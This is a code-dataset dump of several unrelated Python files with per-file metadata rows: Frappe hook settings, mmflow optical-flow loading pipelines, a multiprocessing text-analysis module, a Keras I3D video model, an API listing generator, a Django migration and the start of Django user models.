#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# Server-side document event hooks.
doc_events = {
    "Payment Entry": {
        # Recompute CFDI payment installments whenever a Payment Entry is
        # updated (dotted path resolved by Frappe at dispatch time).
        "on_update": "cfdi.cfdi.doctype.cfdi.cfdi.parcialidades_pe"
    }
}
# Scheduled Tasks
# ---------------
# scheduler_events = {
# "all": [
# "cfdi.tasks.all"
# ],
# "daily": [
# "cfdi.tasks.daily"
# ],
# "hourly": [
# "cfdi.tasks.hourly"
# ],
# "weekly": [
# "cfdi.tasks.weekly"
# ]
# "monthly": [
# "cfdi.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "cfdi.install.before_tests"
# Overriding Whitelisted Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "cfdi.event.get_events"
# }
| 28.751724 | 206 | 0.65987 |
e964ed3c609b1eb1fe5be7276a6692f85571f9fd | 9,756 | py | Python | mmflow/datasets/pipelines/loading.py | ArlenCHEN/mmflow | 8e26e8dd049376d90c569ab6009c36b9af11ff10 | [
"Apache-2.0"
] | null | null | null | mmflow/datasets/pipelines/loading.py | ArlenCHEN/mmflow | 8e26e8dd049376d90c569ab6009c36b9af11ff10 | [
"Apache-2.0"
] | null | null | null | mmflow/datasets/pipelines/loading.py | ArlenCHEN/mmflow | 8e26e8dd049376d90c569ab6009c36b9af11ff10 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
import os.path as osp
import mmcv
import numpy as np
from mmcv import flow_from_bytes, sparse_flow_from_bytes
from ..builder import PIPELINES
from ..utils import read_pfm
@PIPELINES.register_module()
class LoadImageFromFile:
    """Load image1 and image2 from file.

    Required keys are "img_info" (dict that must contain the keys "filename1"
    and "filename2") and "input_size". Added or updated keys are "img1",
    "img2", "img_shape", "ori_shape" (same as `img_shape`), "pad_shape"
    (same as `img_shape`), "scale_factor" (1.0, 1.0) and "img_norm_cfg"
    (means=0 and stds=1).

    Args:
        to_float32 (bool): Whether to convert the loaded image to a float32
            numpy array. If set to False, the loaded image is an uint8 array.
            Defaults to False.
        color_type (str): The flag argument for :func:`mmcv.imfrombytes`.
            Defaults to 'color'.
        file_client_args (dict): Arguments to instantiate a FileClient.
            See :class:`mmcv.fileio.FileClient` for details.
            Defaults to ``dict(backend='disk')``.
        imdecode_backend (str): Backend for :func:`mmcv.imdecode`. Default:
            'cv2'
    """

    def __init__(self,
                 to_float32: bool = False,
                 color_type: str = 'color',
                 file_client_args: dict = dict(backend='disk'),
                 imdecode_backend: str = 'cv2') -> None:
        super().__init__()
        self.to_float32 = to_float32
        self.color_type = color_type
        self.file_client_args = file_client_args
        # Created lazily on the first __call__ (FileClient may not be
        # picklable, so it must not be built in the constructor).
        self.file_client = None
        self.imdecode_backend = imdecode_backend

    def __call__(self, results: dict) -> dict:
        """Call function to load image and get image meta information.

        Args:
            results (dict): Result dict from :obj:`mmflow.BaseDataset`.

        Returns:
            dict: The dict contains loaded image and meta information.
        """
        if self.file_client is None:
            self.file_client = mmcv.FileClient(**self.file_client_args)

        filename1 = results['img_info']['filename1']
        filename2 = results['img_info']['filename2']

        if (not osp.isfile(filename1)) or (not osp.isfile(filename2)):
            raise RuntimeError(
                f'Cannot load file from {filename1} or {filename2}')

        img1_bytes = self.file_client.get(filename1)
        img2_bytes = self.file_client.get(filename2)

        input_size = results['input_size']

        # NOTE(review): stock ``mmcv.imfrombytes`` has the signature
        # (content, flag='color', channel_order='bgr', backend=None); passing
        # ``input_size`` positionally while also passing ``flag=`` would raise
        # a TypeError there. Presumably this targets a patched mmcv that
        # accepts a target size -- confirm before relying on this pipeline.
        img1 = mmcv.imfrombytes(
            img1_bytes, input_size, flag=self.color_type, backend=self.imdecode_backend)
        img2 = mmcv.imfrombytes(
            img2_bytes, input_size, flag=self.color_type, backend=self.imdecode_backend)

        assert img1 is not None  # img2 is not checked -- presumably an oversight

        if self.to_float32:
            img1 = img1.astype(np.float32)
            img2 = img2.astype(np.float32)

        results['filename1'] = filename1
        results['filename2'] = filename2
        results['ori_filename1'] = osp.split(filename1)[-1]
        results['ori_filename2'] = osp.split(filename2)[-1]
        results['img1'] = img1
        results['img2'] = img2
        results['img_shape'] = img1.shape
        results['ori_shape'] = img1.shape
        # Set initial values for default meta_keys
        results['pad_shape'] = img1.shape
        results['scale_factor'] = np.array([1.0, 1.0])
        num_channels = 1 if len(img1.shape) < 3 else img1.shape[2]
        # Identity normalization config (mean 0, std 1, BGR kept).
        results['img_norm_cfg'] = dict(
            mean=np.zeros(num_channels, dtype=np.float32),
            std=np.ones(num_channels, dtype=np.float32),
            to_rgb=False)
        return results

    def __repr__(self) -> str:
        """Return a constructor-style representation of this transform."""
        repr_str = self.__class__.__name__
        repr_str += f'(to_float32={self.to_float32},'
        repr_str += f"color_type='{self.color_type}',"
        repr_str += f"imdecode_backend='{self.imdecode_backend}')"
        return repr_str
@PIPELINES.register_module()
class LoadAnnotations:
    """Load optical flow (and optionally occlusion masks) from files.

    Annotation paths are read from ``results['ann_info']``; any key that
    contains ``'flow'`` (or ``'occ'`` when enabled) is treated as a file to
    load. For every loaded file the path, its basename (under an ``ori_``
    key) and the decoded array (under ``<suffix>_gt``) are written back into
    ``results`` and the ground-truth key is appended to
    ``results['ann_fields']``.

    Args:
        with_occ (bool): Whether to parse and load occlusion masks.
            Defaults to False.
        sparse (bool): Whether the ground-truth flow is sparse.
            Defaults to False.
        file_client_args (dict): Arguments to instantiate a FileClient.
            See :class:`mmcv.fileio.FileClient` for details.
            Defaults to ``dict(backend='disk')``.
    """

    def __init__(
        self,
        with_occ: bool = False,
        sparse: bool = False,
        file_client_args: dict = dict(backend='disk'),
    ) -> None:
        self.with_occ = with_occ
        self.sparse = sparse
        self.file_client_args = file_client_args
        # Built lazily on first use (see __call__).
        self.file_client = None

    def __call__(self, results: dict) -> dict:
        """Load optical flow and, if configured, occlusion annotations.

        Args:
            results (dict): Result dict from :obj:`mmflow.BaseDataset`.

        Returns:
            dict: The dict containing the loaded annotation data.
        """
        if self.file_client is None:
            self.file_client = mmcv.FileClient(**self.file_client_args)

        loader = self._load_sparse_flow if self.sparse else self._load_flow
        results = loader(results)

        return self._load_occ(results) if self.with_occ else results

    def _load_flow(self, results: dict) -> dict:
        """Load dense optical flow annotations into ``results``."""
        prefix = 'filename_'
        for key in list(results['ann_info'].keys()):
            if 'flow' not in key:
                continue
            flow_path = results['ann_info'][key]
            if flow_path.endswith('pfm'):
                # .pfm files are not supported by the file client.
                flow = read_pfm(flow_path)
            else:
                flow = flow_from_bytes(self.file_client.get(flow_path))
            results[key] = flow_path
            results['ori_' + key] = osp.split(flow_path)[-1]
            gt_key = key[len(prefix):] + '_gt'
            results[gt_key] = flow
            results['ann_fields'].append(gt_key)
        return results

    def _load_sparse_flow(self, results: dict) -> dict:
        """Load sparse optical flow annotations into ``results``."""
        prefix = 'filename_'
        for key in list(results['ann_info'].keys()):
            if 'flow' not in key:
                continue
            flow_path = results['ann_info'][key]
            flow, valid = sparse_flow_from_bytes(
                self.file_client.get(flow_path))
            results[key] = flow_path
            results['ori_' + key] = osp.split(flow_path)[-1]
            gt_key = key[len(prefix):] + '_gt'
            # Sparse flow datasets don't include backward flow, so a single
            # validity mask is enough.
            results['valid'] = valid
            results[gt_key] = flow
            results['ann_fields'].append(gt_key)
        return results

    def _load_occ(self, results: dict) -> dict:
        """Load occlusion mask annotations into ``results``."""
        prefix = 'filename_'
        for key in list(results['ann_info'].keys()):
            if 'occ' not in key:
                continue
            occ_path = results['ann_info'][key]
            occ_bytes = self.file_client.get(occ_path)
            # Grayscale mask rescaled from [0, 255] to [0, 1].
            occ = (mmcv.imfrombytes(occ_bytes, flag='grayscale') /
                   255).astype(np.float32)
            results[key] = occ_path
            results['ori_' + key] = osp.split(occ_path)[-1]
            gt_key = key[len(prefix):] + '_gt'
            results[gt_key] = occ
            results['ann_fields'].append(gt_key)
        return results
@PIPELINES.register_module()
class LoadImageFromWebcam(LoadImageFromFile):
    """Load an image pair captured from a webcam.

    Similar to :obj:`LoadImageFromFile`, but the frames are expected to be
    present in ``results['img1']`` / ``results['img2']`` already; no file
    reading takes place.
    """

    def __call__(self, results: dict) -> dict:
        """Attach image meta information for in-memory webcam frames.

        Args:
            results (dict): Result dict with the webcam frames stored in
                ``results['img1']`` and ``results['img2']``.

        Returns:
            dict: The dict containing the images and their meta information.
        """
        first = results['img1']
        second = results['img2']
        if self.to_float32:
            first = first.astype(np.float32)
            second = second.astype(np.float32)

        # There is no backing file, so all filename metadata is None.
        results['filename1'] = None
        results['ori_filename1'] = None
        results['filename2'] = None
        results['ori_filename2'] = None

        results['img1'] = first
        results['img2'] = second
        results['img_shape'] = first.shape
        results['ori_shape'] = first.shape
        results['img_fields'] = ['img1', 'img2']

        # Defaults for the meta keys expected by downstream transforms.
        results['pad_shape'] = first.shape
        results['scale_factor'] = np.array([1.0, 1.0])
        return results
| 34.111888 | 88 | 0.590816 |
dd2cd398e4e139e6809f456add9a00eb17f4537d | 3,436 | py | Python | iaso/analysis/__init__.py | identifiers-org/cmd-iaso | 18d9fb8cab2361eebe9102873eaac991126ee940 | [
"MIT"
] | null | null | null | iaso/analysis/__init__.py | identifiers-org/cmd-iaso | 18d9fb8cab2361eebe9102873eaac991126ee940 | [
"MIT"
] | 2 | 2020-07-29T07:34:14.000Z | 2020-09-03T10:04:31.000Z | iaso/analysis/__init__.py | identifiers-org/cmd-iaso | 18d9fb8cab2361eebe9102873eaac991126ee940 | [
"MIT"
] | null | null | null | import gc
import json
import os
import re
import signal
import time
from functools import partial
from multiprocessing import Pipe, Process
from pathlib import Path
from tqdm import tqdm
from .common_fragments import extract_common_fragments_per_lui
from .shared_fragments import extract_shared_fragments_from_tree
from .suffix_tree import extract_shared_suffix_tree
# Matches ping dump filenames such as ``pings_123.gz``; group 1 captures the
# numeric id. NOTE(review): not referenced in this chunk -- presumably used
# by callers of this package; confirm before removing.
PINGS_PATTERN = re.compile(r"pings_(\d+)\.gz")
class IPCProxy:
    """Forward attribute-style method calls through a multiprocessing pipe.

    ``proxy.some_method(*args, **kwargs)`` does not execute anything locally;
    it sends the tuple ``(name, 'some_method', args, kwargs)`` through
    ``pipe`` so the receiving end can replay the call on the real object
    registered under ``name``. Usable as a context manager: leaving the
    ``with`` block closes the pipe.
    """

    def __init__(self, name, pipe):
        self.name = name
        self.pipe = pipe

    def _dispatch(self, method, *args, **kwargs):
        # One message per proxied call; nothing runs on this side.
        self.pipe.send((self.name, method, args, kwargs))

    def __getattr__(self, attr):
        # Any attribute that is not found normally becomes a deferred
        # remote call bound to that attribute name.
        return partial(self._dispatch, attr)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        self.pipe.close()
def analyse_single_file_worker(outer_progress, inner_progress, filepath, rid, datamine):
    """Analyse one pings file and stream per-LUI JSON records to ``datamine``.

    Runs in a child process (spawned by ``analyse_single_file``), so
    ``outer_progress``, ``inner_progress`` and ``datamine`` are ``IPCProxy``
    handles: every call on them is forwarded to the parent over a pipe
    rather than executed here.
    """
    with outer_progress, inner_progress:
        outer_progress.set_postfix({"rid": rid})

        luis, common_fragments_per_lui = extract_common_fragments_per_lui(
            inner_progress, filepath
        )

        common_lengths = [len(fragments) for fragments in common_fragments_per_lui]
        common_noise = [
            fragments.count("NOISE") for fragments in common_fragments_per_lui
        ]

        # The intermediate structures are large; collect explicitly between
        # phases (and after each `del` below) to keep the peak footprint down.
        gc.collect()

        tree = extract_shared_suffix_tree(
            outer_progress, inner_progress, rid, luis, common_fragments_per_lui
        )

        del common_fragments_per_lui

        gc.collect()

        shared_fragments = extract_shared_fragments_from_tree(
            outer_progress, inner_progress, rid, luis, tree
        )

        del tree

        gc.collect()

        # Stream a JSON array element by element; `datamine` is a proxied
        # file-like object, so json.dump writes travel through the pipe.
        datamine.write("[")

        append_analysis = False

        for l, (lui, fragments) in enumerate(zip(luis, shared_fragments)):
            L = common_lengths[l]

            # LUIs with no common fragments carry no information -- skip.
            if L == 0:
                continue

            C = sum(len(fragment) for fragment in fragments)
            n = len(fragments)

            # Information content estimate derived from how much of the LUI's
            # fragment sequence is NOT covered by fragments shared with other
            # LUIs. NOTE(review): the exact derivation of (L - C + n - 1) / L
            # is not documented here -- confirm against the project docs.
            info = (L - C + n - 1.0) / L

            if append_analysis:
                datamine.write(", ")

            json.dump(
                {
                    "lui": lui,
                    "information_content": round(info, 5),
                    "length": L,
                    "noise": common_noise[l],
                },
                datamine,
            )

            append_analysis = True

        datamine.write("]")
def analyse_single_file(
    datamine, subdir, outer_progress, inner_progress, filename, rid
):
    """Run the analysis for one file in a child process, relaying the child's
    progress-bar and datamine calls back onto the real objects in this
    (parent) process.

    The child only receives :class:`IPCProxy` handles; every proxied call
    arrives here through ``pipe_read`` as ``(proxy_name, method, args,
    kwargs)`` and is replayed on the matching real object.
    """
    # One-way pipe: child writes, parent reads.
    pipe_read, pipe_write = Pipe(False)

    process = Process(
        target=analyse_single_file_worker,
        args=(
            IPCProxy("outer_progress", pipe_write),
            IPCProxy("inner_progress", pipe_write),
            subdir / filename,
            rid,
            IPCProxy("datamine", pipe_write),
        ),
    )

    process.start()

    # Close the parent's copy of the write end so that recv() raises
    # EOFError once the child exits and its copy closes.
    pipe_write.close()

    proxies = {
        "outer_progress": outer_progress,
        "inner_progress": inner_progress,
        "datamine": datamine,
    }

    # Message pump: replay every proxied call until the child hangs up.
    while True:
        try:
            (proxy_name, method, args, kwargs) = pipe_read.recv()

            getattr(proxies[proxy_name], method)(*args, **kwargs)
        except EOFError:
            break

    inner_progress.set_description("Finalising resource analysis")
    inner_progress.reset(total=1)

    process.join()
061fcd31c92492ec6f44aa73d711746a02407dba | 14,810 | py | Python | model_i3d.py | SocialHelpers/Inception3d_for_Indian_Sign_language | c48cd95fd1b87b25ba5aba6da12f9bf7462311bf | [
"MIT"
] | 1 | 2019-11-02T19:04:49.000Z | 2019-11-02T19:04:49.000Z | model_i3d.py | SocialHelpers/Inception3d_for_Indian_Sign_language | c48cd95fd1b87b25ba5aba6da12f9bf7462311bf | [
"MIT"
] | 4 | 2019-11-04T11:21:59.000Z | 2022-02-09T23:33:12.000Z | model_i3d.py | SocialHelpers/Inception3d_for_Indian_Sign_language | c48cd95fd1b87b25ba5aba6da12f9bf7462311bf | [
"MIT"
] | 3 | 2019-09-16T15:51:07.000Z | 2022-03-16T10:18:01.000Z | """
Keras implementation of
Inception-v1 Inflated 3D ConvNet used for Kinetics CVPR paper and introduced in
"Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset" by
Joao Carreira, Andrew Zisserman
https://arxiv.org/abs/1705.07750v1
"""
from __future__ import print_function
from __future__ import absolute_import
import os
from keras.models import Model, load_model
from keras import layers
from keras.layers import Activation
from keras.layers import Input
from keras.layers import BatchNormalization
from keras.layers import Conv3D
from keras.layers import MaxPooling3D
from keras.layers import AveragePooling3D
from keras.layers import Dropout
from keras.layers import Reshape
from keras.layers import Lambda
from keras.utils.data_utils import get_file
from keras import backend as K
def conv3d_bn(x,
              filters,
              num_frames,
              num_row,
              num_col,
              padding='same',
              strides=(1, 1, 1),
              use_bias=False,
              use_activation_fn=True,
              use_bn=True,
              name=None):
    """Apply a 3D convolution, optionally followed by batch norm and ReLU.

    The convolution layer is named ``<name>_conv``, the batch-norm layer
    ``<name>_bn`` and the activation ``<name>`` (all unnamed when ``name``
    is None).

    :return: Output tensor after `Conv3D` and the optional
        `BatchNormalization` / `relu` stages.
    """
    conv_name = name + '_conv' if name is not None else None
    bn_name = name + '_bn' if name is not None else None

    x = Conv3D(filters,
               (num_frames, num_row, num_col),
               strides=strides,
               padding=padding,
               use_bias=use_bias,
               name=conv_name)(x)

    if use_bn:
        # Channels axis depends on the backend's image data format.
        bn_axis = 1 if K.image_data_format() == 'channels_first' else 4
        x = BatchNormalization(axis=bn_axis, scale=False, name=bn_name)(x)

    if use_activation_fn:
        x = Activation('relu', name=name)(x)

    return x
def Inception_Inflated3d_Top(input_shape, classes, dropout_prob):
    """Build the I3D classification head as a standalone Keras model.

    The head applies dropout, a 1x1x1 logits convolution, averages the
    per-frame scores over the temporal axis and finishes with a softmax.

    :param input_shape: Shape of the headless backbone's output (no batch dim).
    :param classes: Number of output classes.
    :param dropout_prob: Dropout probability before the logits layer.
    :return: A Keras model named ``i3d_top``.
    """
    head_input = Input(shape=input_shape, name="input")

    net = Dropout(dropout_prob)(head_input)

    net = conv3d_bn(net, classes, 1, 1, 1, padding='same',
                    use_bias=True, use_activation_fn=False, use_bn=False,
                    name='Conv3d_6a_1x1')

    frames_left = int(net.shape[1])
    net = Reshape((frames_left, classes))(net)

    # Average the per-frame logits over the temporal axis.
    net = Lambda(lambda t: K.mean(t, axis=1, keepdims=False),
                 output_shape=lambda s: (s[0], s[2]))(net)

    net = Activation('softmax', name='prediction')(net)

    return Model(inputs=head_input, outputs=net, name="i3d_top")
def add_i3d_top(base_model: Model, classes: int, dropout_prob: float) -> Model:
    """Attach a freshly built classification head to a headless I3D model.

    Args:
        base_model: I3D model built with ``include_top=False``.
        classes: Number of output classes for the new head.
        dropout_prob: Dropout probability applied before the logits layer.
            (Annotation fixed: this is a probability, not a bool.)

    Returns:
        A new :class:`Model` mapping ``base_model``'s input to class
        probabilities, named ``i3d_with_top``.
    """
    top_model = Inception_Inflated3d_Top(base_model.output_shape[1:], classes,
                                         dropout_prob)

    x = base_model.output
    predictions = top_model(x)
    # `outputs=` (plural) is the supported Model keyword, consistent with
    # Inception_Inflated3d_Top above; the legacy `output=` alias is not
    # accepted by current Keras releases.
    new_model = Model(inputs=base_model.input, outputs=predictions,
                      name="i3d_with_top")

    return new_model
def I3D_load(sPath, nFramesNorm, tuImageShape, nClasses):
    """Keras ``load_model`` plus input & output shape validation.

    :param sPath: Path to the saved Keras model file.
    :param nFramesNorm: Expected number of frames in the input clip.
    :param tuImageShape: Expected per-frame shape tuple.
    :param nClasses: Expected number of output classes.
    :raises ValueError: If the loaded model's input or output shape does
        not match the expectations.
    :return: The loaded Keras model.
    """
    print("Load trained I3D model from %s ..." % sPath)
    loaded_model = load_model(sPath)

    shape_in = loaded_model.input_shape[1:]
    shape_out = loaded_model.output_shape[1:]
    print("Loaded input shape %s, output shape %s" % (str(shape_in), str(shape_out)))

    if shape_in != ((nFramesNorm,) + tuImageShape):
        raise ValueError("Unexpected I3D input shape")
    if shape_out != (nClasses,):
        raise ValueError("Unexpected I3D output shape")

    return loaded_model
def _inception_mixed_block(x, specs, block_id, channel_axis):
    """One Inception ('Mixed') module with four parallel branches.

    ``specs`` is ``(b0, (b1a, b1b), (b2a, b2b), b3)`` where:
        b0        -- 1x1x1 conv filters of branch 0
        b1a, b1b  -- 1x1x1 bottleneck and 3x3x3 conv filters of branch 1
        b2a, b2b  -- 1x1x1 bottleneck and 3x3x3 conv filters of branch 2
        b3        -- 1x1x1 conv filters after max pooling in branch 3

    Layer names follow the pretrained-weights convention
    (``Conv3d_<id>_0a_1x1`` etc.), so they must not change.
    """
    b0, (b1a, b1b), (b2a, b2b), b3 = specs

    branch_0 = conv3d_bn(x, b0, 1, 1, 1, padding='same',
                         name='Conv3d_%s_0a_1x1' % block_id)

    branch_1 = conv3d_bn(x, b1a, 1, 1, 1, padding='same',
                         name='Conv3d_%s_1a_1x1' % block_id)
    branch_1 = conv3d_bn(branch_1, b1b, 3, 3, 3, padding='same',
                         name='Conv3d_%s_1b_3x3' % block_id)

    branch_2 = conv3d_bn(x, b2a, 1, 1, 1, padding='same',
                         name='Conv3d_%s_2a_1x1' % block_id)
    branch_2 = conv3d_bn(branch_2, b2b, 3, 3, 3, padding='same',
                         name='Conv3d_%s_2b_3x3' % block_id)

    branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same',
                            name='MaxPool2d_%s_3a_3x3' % block_id)(x)
    branch_3 = conv3d_bn(branch_3, b3, 1, 1, 1, padding='same',
                         name='Conv3d_%s_3b_1x1' % block_id)

    return layers.concatenate(
        [branch_0, branch_1, branch_2, branch_3],
        axis=channel_axis,
        name='Mixed_%s' % block_id)


def Inception_Inflated3d(include_top=True,
                         weights=None,
                         input_tensor=None,
                         input_shape=None,
                         dropout_prob=0.0,
                         endpoint_logit=True,
                         classes=400):
    """Instantiate the Inflated 3D Inception-v1 (I3D) architecture.

    Args:
        include_top: Whether to build the classification head.
        weights: ``None``, ``'flow_imagenet_and_kinetics'`` or a file path;
            only validated, see the NOTE in the weight-loading section.
        input_tensor: Unused; kept for interface compatibility.
        input_shape: Input shape tuple, e.g. ``(frames, h, w, channels)``.
        dropout_prob: Dropout probability before the logits (top only).
        endpoint_logit: If True, the top returns raw logits (no softmax).
        classes: Number of output classes for the head.

    :return: Inception i3D model with pretrained flow weights loaded.
    """
    WEIGHTS_NAME = ['flow_imagenet_and_kinetics']

    # Paths to pretrained models with the classification head.
    WEIGHTS_PATH = {
        'flow_imagenet_and_kinetics': 'https://github.com/dlpbc/keras-kinetics-i3d/releases/download/v0.2/flow_inception_i3d_imagenet_and_kinetics_tf_dim_ordering_tf_kernels.h5'
    }
    # Paths to pretrained models without the classification head.
    WEIGHTS_PATH_NO_TOP = {
        'flow_imagenet_and_kinetics': 'https://github.com/dlpbc/keras-kinetics-i3d/releases/download/v0.2/flow_inception_i3d_imagenet_and_kinetics_tf_dim_ordering_tf_kernels_no_top.h5'
    }

    if not (weights in WEIGHTS_NAME or weights is None or os.path.exists(weights)):
        raise ValueError('The `weights` argument should be either '
                         '`None` (random initialization) or %s' %
                         str(WEIGHTS_NAME) + ' '
                         'or a valid path to a file containing `weights` values')

    img_input = Input(shape=input_shape)

    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = 4

    # Stem: downsampling via convolution (spatial and temporal).
    x = conv3d_bn(img_input, 64, 7, 7, 7, strides=(2, 2, 2), padding='same', name='Conv3d_1a_7x7')

    # Downsampling (spatial only).
    x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_2a_3x3')(x)
    x = conv3d_bn(x, 64, 1, 1, 1, strides=(1, 1, 1), padding='same', name='Conv3d_2b_1x1')
    x = conv3d_bn(x, 192, 3, 3, 3, strides=(1, 1, 1), padding='same', name='Conv3d_2c_3x3')

    # Downsampling (spatial only).
    x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_3a_3x3')(x)

    # Inception modules (filter counts unchanged from the original
    # hand-unrolled version; see _inception_mixed_block for the spec layout).
    x = _inception_mixed_block(x, (64, (96, 128), (16, 32), 32), '3b', channel_axis)
    x = _inception_mixed_block(x, (128, (128, 192), (32, 96), 64), '3c', channel_axis)

    # Downsampling (spatial and temporal).
    x = MaxPooling3D((3, 3, 3), strides=(2, 2, 2), padding='same', name='MaxPool2d_4a_3x3')(x)

    x = _inception_mixed_block(x, (192, (96, 208), (16, 48), 64), '4b', channel_axis)
    x = _inception_mixed_block(x, (160, (112, 224), (24, 64), 64), '4c', channel_axis)
    x = _inception_mixed_block(x, (128, (128, 256), (24, 64), 64), '4d', channel_axis)
    x = _inception_mixed_block(x, (112, (144, 288), (32, 64), 64), '4e', channel_axis)
    x = _inception_mixed_block(x, (256, (160, 320), (32, 128), 128), '4f', channel_axis)

    # Downsampling (spatial and temporal).
    x = MaxPooling3D((2, 2, 2), strides=(2, 2, 2), padding='same', name='MaxPool2d_5a_2x2')(x)

    x = _inception_mixed_block(x, (256, (160, 320), (32, 128), 128), '5b', channel_axis)
    x = _inception_mixed_block(x, (384, (192, 384), (48, 128), 128), '5c', channel_axis)

    if include_top:
        # Classification block.
        x = AveragePooling3D((2, 7, 7), strides=(1, 1, 1), padding='valid', name='global_avg_pool')(x)
        x = Dropout(dropout_prob)(x)

        x = conv3d_bn(x, classes, 1, 1, 1, padding='same',
                      use_bias=True, use_activation_fn=False, use_bn=False, name='Conv3d_6a_1x1')

        num_frames_remaining = int(x.shape[1])
        x = Reshape((num_frames_remaining, classes))(x)

        # Logits: average the per-frame scores over the temporal axis.
        x = Lambda(lambda t: K.mean(t, axis=1, keepdims=False),
                   output_shape=lambda s: (s[0], s[2]))(x)

        if not endpoint_logit:
            x = Activation('softmax', name='prediction')(x)
    else:
        h = int(x.shape[2])
        w = int(x.shape[3])
        x = AveragePooling3D((2, h, w), strides=(1, 1, 1), padding='valid', name='global_avg_pool')(x)

    # Create the model.
    model = Model(img_input, x, name='i3d_inception')

    # NOTE(review): the pretrained flow weights are downloaded and loaded
    # unconditionally, i.e. independently of the `weights` argument (even
    # when it is None). Kept as-is to preserve behavior -- confirm intent.
    if include_top:
        weights_url = WEIGHTS_PATH['flow_imagenet_and_kinetics']
        model_name = 'i3d_inception_flow_imagenet_and_kinetics.h5'
    else:
        weights_url = WEIGHTS_PATH_NO_TOP['flow_imagenet_and_kinetics']
        model_name = 'i3d_inception_flow_imagenet_and_kinetics_no_top.h5'

    downloaded_weights_path = get_file(model_name, weights_url, cache_subdir='models')
    model.load_weights(downloaded_weights_path)

    return model
if "_name_" == "_main_":
keI3DOflow = Inception_Inflated3d(include_top=False, weights='flow_imagenet_and_kinetics',
input_shape=(40, 224, 224, 2))
| 39.179894 | 184 | 0.648616 |
2e146bccb657a276022a0ea42ce7a5a35fe4cf2b | 763 | py | Python | zdgen/backend/listing/generator.py | fprimex/zdgen | f351e979cf719e526450fb00ba27689455dbf736 | [
"MIT"
] | 2 | 2019-11-30T20:26:44.000Z | 2021-07-24T04:05:47.000Z | zdgen/backend/listing/generator.py | fprimex/zdgen | f351e979cf719e526450fb00ba27689455dbf736 | [
"MIT"
] | null | null | null | zdgen/backend/listing/generator.py | fprimex/zdgen | f351e979cf719e526450fb00ba27689455dbf736 | [
"MIT"
] | null | null | null | import itertools
def _sanitize(q):
return q.replace('[', '_').replace(']', '')
def generate(api_items, duplicate_api_items, dupe_info):
    """Render a plain-text listing of every API endpoint, sorted by path.

    Each line shows the HTTP method (left-justified to 8 columns, or
    ``MULTIPLE`` when the item carries no single method), the path and a
    query string with ``<arg>`` placeholders. ``duplicate_api_items`` and
    ``dupe_info`` are accepted for interface compatibility with the other
    backends but are not used here.

    :return: ``('listing.txt', content)`` tuple for the listing backend.
    """
    lines = []
    # Stable sort by path; items with equal paths keep insertion order.
    for item in sorted(api_items.values(), key=lambda it: it['path']):
        params = item['query_params']
        query = ('?' + '&'.join('{0}=<arg>'.format(p) for p in params)
                 if params else '')
        # We expect a method, but it is not guaranteed.
        method = 'MULTIPLE' if item['method'] is None else item['method']
        lines.append('{:<8} {}{}\n'.format(method, item['path'], query))
    return ('listing.txt', ''.join(lines))
| 24.612903 | 77 | 0.550459 |
3a9bdd79c86faad0101c574aab8c9b6eb4bae8a2 | 472 | py | Python | apps/jobs/migrations/0011_Change_submission_visibility_default_to_public.py | geekayush/EvalAI | 3b6e3c20c9a9f08da84426566a8bfe0753e46782 | [
"BSD-3-Clause"
] | 3 | 2019-02-24T10:57:09.000Z | 2019-02-24T16:49:32.000Z | apps/jobs/migrations/0011_Change_submission_visibility_default_to_public.py | geekayush/EvalAI | 3b6e3c20c9a9f08da84426566a8bfe0753e46782 | [
"BSD-3-Clause"
] | 2 | 2019-02-09T04:51:10.000Z | 2019-02-09T04:51:23.000Z | apps/jobs/migrations/0011_Change_submission_visibility_default_to_public.py | geekayush/EvalAI | 3b6e3c20c9a9f08da84426566a8bfe0753e46782 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-01-21 19:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Change the default of ``Submission.is_public`` to True (public)."""

    dependencies = [
        # Must run after the metadata `blank` change on Submission.
        ('jobs', '0010_Add_blank_in_submission_metadata'),
    ]

    operations = [
        # Only the field default changes; existing rows are left untouched.
        migrations.AlterField(
            model_name='submission',
            name='is_public',
            field=models.BooleanField(default=True),
        ),
    ]
| 22.47619 | 58 | 0.633475 |
3a971dfb374cdd8a6678ad80cdcce45ae05992f1 | 2,618 | py | Python | app/core/models.py | jhgutsol1290/recipe-app-api | 1c2ca015a05b0309f80b074e4df08e5180a1cbe7 | [
"MIT"
] | null | null | null | app/core/models.py | jhgutsol1290/recipe-app-api | 1c2ca015a05b0309f80b074e4df08e5180a1cbe7 | [
"MIT"
] | null | null | null | app/core/models.py | jhgutsol1290/recipe-app-api | 1c2ca015a05b0309f80b074e4df08e5180a1cbe7 | [
"MIT"
] | null | null | null | import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
    """Return a unique upload path for a new recipe image.

    The original name is discarded except for its extension; a random UUID
    replaces it to avoid filename collisions. ``instance`` is required by
    Django's ``upload_to`` contract but is not used.
    """
    extension = filename.split('.')[-1]
    unique_name = '{}.{}'.format(uuid.uuid4(), extension)
    return os.path.join('uploads/recipe/', unique_name)
class UserManager(BaseUserManager):
    """Manager that creates user accounts keyed by email instead of username."""

    def create_user(self, email, password=None, **extra_fields):
        """Create, persist and return a regular user account."""
        if not email:
            raise ValueError('Users must have an email address')
        account = self.model(email=self.normalize_email(email), **extra_fields)
        account.set_password(password)
        account.save(using=self._db)
        return account

    def create_superuser(self, email, password):
        """Create, persist and return a superuser with staff access."""
        account = self.create_user(email, password)
        account.is_superuser = True
        account.is_staff = True
        account.save(using=self._db)
        return account
class User(AbstractBaseUser, PermissionsMixin):
    """Custom user model that supports using email instead of username"""
    # Unique email doubles as the login identifier (see USERNAME_FIELD below).
